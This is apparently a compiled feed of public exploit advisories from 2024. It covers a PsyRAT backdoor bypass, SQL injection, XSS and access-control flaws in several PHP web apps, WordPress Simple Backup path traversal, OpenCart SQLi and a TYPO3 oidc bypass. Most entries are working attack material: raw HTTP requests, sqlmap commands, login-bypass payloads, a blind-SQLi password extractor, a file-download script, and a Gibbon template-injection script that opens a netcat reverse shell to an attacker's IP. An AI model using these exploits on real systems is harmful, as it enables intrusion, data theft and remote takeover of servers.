The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/0e6e40aad3e8d46e3c0c26ccc6ab94b3.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Agent.ju (PSYRAT)Vulnerability: Authentication Bypass RCEFamily: PSYRATType: PE32MD5: 0e6e40aad3e8d46e3c0c26ccc6ab94b3Vuln ID: MVID-2024-0677Disclosure: 04/01/2024Description: The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor. The malware will return a BADPWD and or "Invalid command" error string but the command executes regardless. Custom client is required as it seems to dislike CRLF \r\n characters when using netcat or telnet.getdrives C\ - Fixed Drive^D\ - CD-ROM^cpuinfo Windows Version |System Directory C\WINDOWS\system32|Computer Name DESKTOP-2C4IQJO|Username VICTIM|CPU Speed 2808 MHz|CPU Type GenuineIntel|------|PsyRAT Version PsyRAT 1.02|IP/Port 192.168.18.130|Password |Install name |Reg value |PHP URLexe_sho [Program_Name] starts a program Exploit/PoC:from socket import *MALWARE_HOST="x.x.x.x"PORT=55116s=socket(AF_INET, SOCK_STREAM)s.connect((MALWARE_HOST, PORT))#send bad passwordPAYLOAD="malvuln" s.send(PAYLOAD.encode())#call commandsPAYLOAD="exe_sho calc" s.send(PAYLOAD.encode())s.close()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.ju (PSYRAT) MVID-2024-0677 Bypass / Command Execution

Daily Habit Tracker version 1.0 suffers from an access control vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24496### Broken Access Control:> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.### Affected Components:> home.php, add-tracker.php, delete-tracker.php, update-tracker.php### Description:> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.## Proof of Concept:### Unauthenticated Access to Home page> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.### Create Tracker as Unauthenticated UserTo create a tracker, use the following request:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 108Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```### Update Tracker as Unauthenticated UserTo update a tracker, use the following request:```POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 121Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes```### Delete Tracker as Unauthenticated User:To delete a tracker, use the following request:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.

Daily Habit Tracker 1.0 Broken Access Control

Daily Habit Tracker version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24495### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> delete-tracker.php### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)### SQLMapSave the following request to `delete_tracker.txt`:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 SQL Injection

Daily Habit Tracker version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24494### Stored Cross-Site Scripting (XSS):> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.### Affected Components:> add-tracker.php, update-tracker.phpVulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat### Description:> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.## Proof of Concept:The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 175Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 Cross Site Scripting

Employee Management System version 1.0 suffers from additional remote SQL injection vulnerabilities. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    # Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24499### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/edit_profile.php> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### SQLMapSave the following request to `edit_profile.txt`:```POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 88Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/edit_profile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.------------------------# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24497### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/login.php> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true)![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `' and 1=1-- -` can be used to bypass authentication within admin login page.```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 61Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpCookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=```### SQLMapSave the following request to `admin_login.txt`:```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin&txtpassword=password&btnlogin=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Employee Management System 1.0 SQL Injection

WordPress Simple Backup plugin versions prior to 2.7.10 suffer from file download and path traversal vulnerabilities.

    # Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal# Date: 2024-03-06# Exploit Author: Ven3xy# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip# Version: 2.7.10# Tested on: Linuximport sysimport requestsfrom urllib.parse import urljoinimport timedef exploit(target_url, file_name, depth):    traversal = '../' * depth    exploit_url = urljoin(target_url, '/wp-admin/tools.php')    params = {        'page': 'backup_manager',        'download_backup_file': f'{traversal}{file_name}'    }    response = requests.get(exploit_url, params=params)    if response.status_code == 200 and response.headers.get('Content-Disposition') \            and 'attachment; filename' in response.headers['Content-Disposition'] \            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:        print(response.text)  # Replace with the desired action for the downloaded content        file_path = f'simplebackup_{file_name}'        with open(file_path, 'wb') as file:            file.write(response.content)        print(f'File saved in: {file_path}')    else:        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")if __name__ == "__main__":    if len(sys.argv) != 4:        print("Usage: python exploit.py <target_url> <file_name> <depth>")        sys.exit(1)    target_url = sys.argv[1]    file_name = sys.argv[2]    depth = int(sys.argv[3])    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")    time.sleep(5)    exploit(target_url, file_name, depth)

WordPress Simple Backup Path Traversal / Arbitrary File Download

OpenCart Core version 4.0.2.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi# Date: 2024-04-2# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://github.com/opencart/opencart/releases# Version: 4.0.2.3# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=product/search&search=test- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs===========Output :Parameter: search (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: route=product/search&search=') AND 2427=2427-- drCaType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

OpenCart Core 4.0.2.3 SQL Injection

Online Hotel Booking in PHP version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title:  Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)# Google Dork: n/a# Date: 04/02/2024# Exploit Author: Gian Paris C. Agsam# Vendor Homepage: https://github.com/projectworldsofficial# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip# Version: 1.0# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12# CVE : n/aimport requestsimport argparsefrom colorama import (Fore as F, Back as B, Style as S)BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITErequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')parser.add_argument('-u', '--url', help='')args = parser.parse_args()def banner():    print(f"""{FR}      ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄  ▄▄▄        ▪  ·▄▄▄▄  ▪     ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪     ██ ██▪ ██  ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄  ▄█▀▄ ▐█·▐█· ▐█▌▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██  ▀█▄▀▪▀▀▀ ▀▀▀  ▀▀▀▀  ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀  ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•         Github: https://github.com/offensive-droid         {FW}    """)# Define the characters to testchars = [    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',    'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',    'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',    '8', '9', '@', '#']def sqliPayload(char, position, userid, column, table):    sqli = 'admin\' UNION SELECT IF(SUBSTRING('    sqli += str(column) + ','    sqli += str(position) + ',1) = \''    sqli += str(char) + '\',sleep(3),null) FROM '    sqli += str(table) + ' WHERE uname="admin"\''    return sqlidef postRequest(URL, sqliReq, char, position):    sqliURL = URL    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)    if req.elapsed.total_seconds() >= 2:        print("{} : {}".format(char, req.elapsed.total_seconds()))        return char    return ''def theHarvester(target, CHARS, url):    #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))    print("Retrieving admin password".format(target['table'], target['column'], target['id']))    position = 1    full_pass = ""    while position < 5:        for char in CHARS:            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])            found_char = postRequest(url, sqliReq, char, position)            full_pass += found_char        position += 1    return full_passif __name__ == "__main__":    banner()    HOST = str(args.url)    PATH = HOST + "/hotel booking/admin/login.php"    adminPassword = {"id": "1", "table": "manager", "column": "upass"}    adminPass = theHarvester(adminPassword, chars, PATH)    print("Admin Password:", adminPass)

Online Hotel Booking In PHP 1.0 SQL Injection

The authentication service of the extension does not verify the OpenID Connect authentication state from the user lookup chain. Instead, the authentication service authenticates every valid frontend user from the user lookup chain, where the  frontend user field “tx_oidc” is not empty.

In scenarios, where either ext:felogin is active or where `$GLOBALS['TYPO3_CONF_VARS'][‘FE’][‘checkFeUserPid’]` is disabled, an attacker can login to OpenID Connect frontend user accounts by providing a valid username and any password. 

**OpenID Connect Authentication (oidc) Typo3 extension Authentication Bypass**

Moderate severity GitHub Reviewed Published Apr 2, 2024 to the GitHub Advisory Database • Updated Apr 2, 2024

**Package**

composer causal/oidc (Composer)

**Affected versions**

< 2.1.0

**Patched versions**

2.1.0

**Description**

The authentication service of the extension does not verify the OpenID Connect authentication state from the user lookup chain. Instead, the authentication service authenticates every valid frontend user from the user lookup chain, where the frontend user field “tx\_oidc” is not empty.

In scenarios, where either ext:felogin is active or where $GLOBALS['TYPO3_CONF_VARS'][‘FE’][‘checkFeUserPid’] is disabled, an attacker can login to OpenID Connect frontend user accounts by providing a valid username and any password.

**References**

*   https://github.com/FriendsOfPHP/security-advisories/blob/master/causal/oidc/CVE-2024-30173.yaml
*   https://typo3.org/security/advisory/typo3-ext-sa-2024-002

Published to the GitHub Advisory Database

Apr 2, 2024

Reviewed

Apr 2, 2024

Last updated

Apr 2, 2024

**Severity**

Moderate

6.0

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

High

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

Low

Availability

None

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O/RC:C

**Weaknesses**

CWE-284

**CVE ID**

CVE-2024-30173

**GHSA ID**

GHSA-hhf8-f5w9-g6vh

**Source code**

xperseguers/t3ext-oidc

Checking history

See something to contribute? Suggest improvements for this vulnerability.

GHSA-hhf8-f5w9-g6vh: OpenID Connect Authentication (oidc) Typo3 extension Authentication Bypass

Gibbon version 26.0.00 suffers from a server-side template injection vulnerability that allows for remote code execution.

    # Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version# Date: 21.01.2024# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)# Vendor Homepage: https://gibbonedu.org/# Software Link: https://github.com/GibbonEdu/core# Version: v26.0.00# Tested on: Ubuntu 22.0# CVE : CVE-2024-24724import requestsimport reimport sysdef login(target_host, target_port,email,password):    url = f'http://{target_host}:{target_port}/login.php?timeout=true'    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}    data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"    r = requests.post(url, headers=headers, data=data, allow_redirects=False)    Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])    if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):        print("login successful!")    return Session_Cookie[4]def rce(cookie, target_host, target_port, attacker_ip, attacker_port):    url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie}    data = f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n/modules/School Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"    r = requests.post(url, headers=headers, data=data, allow_redirects=False)    if 'success0' in str(r.headers['Location']):        print("Payload uploaded successfully!")def trigger(cookie, target_host, target_port):    url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'    headers = {"Cookie": cookie}    print("RCE successful!")    r = requests.get(url, headers=headers, allow_redirects=False)if __name__ == '__main__':    if len(sys.argv) != 7:        print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>")        sys.exit(1)    cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])    rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])    trigger(cookie, sys.argv[1], sys.argv[2])

Tag

#php